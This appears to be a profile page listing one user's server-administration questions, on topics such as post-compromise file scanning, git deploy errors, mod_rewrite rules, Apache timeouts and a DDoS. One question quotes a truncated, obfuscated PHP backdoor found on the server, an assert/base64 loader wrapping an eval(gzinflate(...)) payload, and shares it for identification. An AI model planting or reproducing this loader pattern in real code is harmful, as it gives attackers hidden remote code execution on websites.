sbuck's questions

In preparation for migrating servers after an infiltration, we want to scrub our data and make sure it doesn't contain any malicious hacks or security holes.

To give you an idea of what I mean, here's a list (so far) of tests we'll run:

1) Compare each file against a keywords list of malicious keywords (eval,base64,iframe,viagra,etc) 2) Scan over any file with more than one period (has been a symptom of hacked files in the past) 3) Pinpoint any files with excessively long names (another symptom)

Any ideas of things I should add to this list?

Based on your experience, how long does it typically take to get a EV SSL cert approved?

I have a web interface for deploying scripts from our repo at Github to our live server. The web interface just triggers a bash script with some git commands. If I make changes locally, push to repo, then run the bash script to pull from repo to live it works fine. However, if I make changes directly in the repo (via Github's web interface), I'm running into fast-forward / lock issues.

These are the steps I'm taking:

1. Make a change on a file at Github repo

2. Run a bash script (as apache) via web from live server that attempts a git push / pull. Get these problems:

   PUSH
   To [email protected]:name/name.git
   ! [rejected]        master -> master (non-fast-forward)
   error: failed to push some refs to '[email protected]:name/name.git'
   To prevent you from losing history, non-fast-forward updates were rejected
   Merge the remote changes before pushing again.  See the 'Note about
   fast-forwards' section of 'git push --help' for details.
   
   PULL
   From github.com:name/name
   branch            master     -> FETCH_HEAD
   error: unable to unlink old 'includes/footer.inc' (Permission denied)
   Updating 8f6d922..d1eba9d
   Updating 8f6d922..d1eba9d
   

3. SSH in as root, attempt a push / pull and it works fine.

Ideas on why would this method does not work from apache?

Following the instructions here: http://linuxdevcenter.com/pub/a/linux/lpt/20_08.html

I'm aiming to tar up a directory but only want to include .php files from that directory.

Given the aforementioned instructions, I've come up with this command. It creates a file called IncludeTheseFiles which lists all the .php files, then the tar is supposed to do it's job only using the files listed in IncludeTheseFiles

find myProjectDirectory -type f -print | \
egrep '(\.[php]|[Mm]akefile)$' > IncludeTheseFiles
tar cvf myProjectTarName -I IncludeTheseFiles

However, when I run this it doesn't like the I include option?

tar: invalid option -- I

Options +FollowSymlinks
RewriteEngine on
RewriteCond %{HTTP_HOST} ^www\.(.*) [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,NC,L]

Am running the above code and it strips the www when you go to http://www.mydomain.com but how do I get it to also strip the www when you go to a subdirectory, etc http://www.mydomain.com/users ?

Is it possible to locate files in a directory that have strings (with no spaces) longer than x length?

Is it possible to use grep with a text file of keywords?

For example instead of grep -r "keyword" directory/ Something like grep -r keywordList.txt includes/

where keywordList.txt is full of a bunch of keywords?

Running a heavy script, getting this error in apache log:

(70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed, referer: http://domains/scriptName.php   

Tried upping max_execution_time, max_input_time to no avail. Is there some other setting I need to bump up?

It says timeout which makes me think it's not getting enough time to finish, but the "content_length_filter" is telling me maybe it's choking on too much data that the query is doing?

I realize the answer to this question will vary, which is why I'm asking it. If you've suffered a DDoS attack before - how long did it last?

Just trying to get an idea of how long we'll have to continue to wage this battle (going on a couple weeks now).

Found an odd file we didn't create in one of our directories.

It was named ".moreinfoege.php.KJt" In the directory we also had a file called moreinfo.php

We've been having server issues lately (WordPress hacks, DDoS attack) so we're obv on high alert for other infiltrations. Is this a hack? What are some of the ways it could have gotten in?

Here's what its contents looked like (long gibberish string abbreviated to fit here):

<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>

Approaching some bandwidth limits on our VPS. Is there a good way to narrow down which scripts may be sucking up the most bandwidth?

We're on a VPS w/ CentOS 5 with cPanel + WHM 11 latest

We started noticing last night that httpd and occasionally mysql keeps consistently peaking in the 500%'s of CPU usage, so much so that our host kept suspending our account because of it.

We've had two server teams look into it and neither can identify why this is happening.

We haven't been experiencing any influx of traffic, and nothing major has changed code wise.

We're seeing lots of these in our apache error log

[Mon Nov 16 21:53:24 2009] [error] [client 65.55.207.22] Request exceeded the limit of 200 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.

I can't find any redirect loops in the code, and up until now our .htaccess config hasn't been causing any problems:

DirectoryIndex home.html index.htm index.html index.php


RewriteEngine on
RewriteCond %{HTTP_HOST} ^www\.(.*) [NC]
RewriteCond %{HTTPS}s<>%1 ^(on(s)|offs)<>(.*)
RewriteRule ^(.*) http%2://%3/$1 [L,R=permanent]

RewriteRule ^c/([0-9]+)$ /main/?p=$1 [R=301,L]


Addhandler application/x-httpd-php5 .html .inc
AddHandler application/x-httpd-php5 .inc .html

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

I realize this isn't very much info, and it's hard to say without digging in, but wanted to throw this out there if anything raised any red flags or if you have any suggestions on where we could further look into.

It seems like chkservd is frequently having to restart services on our server and I was curious if the frequency was common or if we should be concerned with our VPS's reliability. I.E., on a "good" server are service restarts common every couple weeks or should they not even happen that often?

Here's a summary of the frequency of failures + restarts for the month of July:

July 30 named
July 20 httpd
July 19 httpd
July 16 httpd
July 10 httpd
July 8  imap, mysql, spamd
July 6  named
July 3  named

Server details:

cPanel 11.24.5-R37629 - WHM 11.24.2 - X 3.9
CENTOS 5.3 i686 virtuozzo on host
VPS Hybrid Server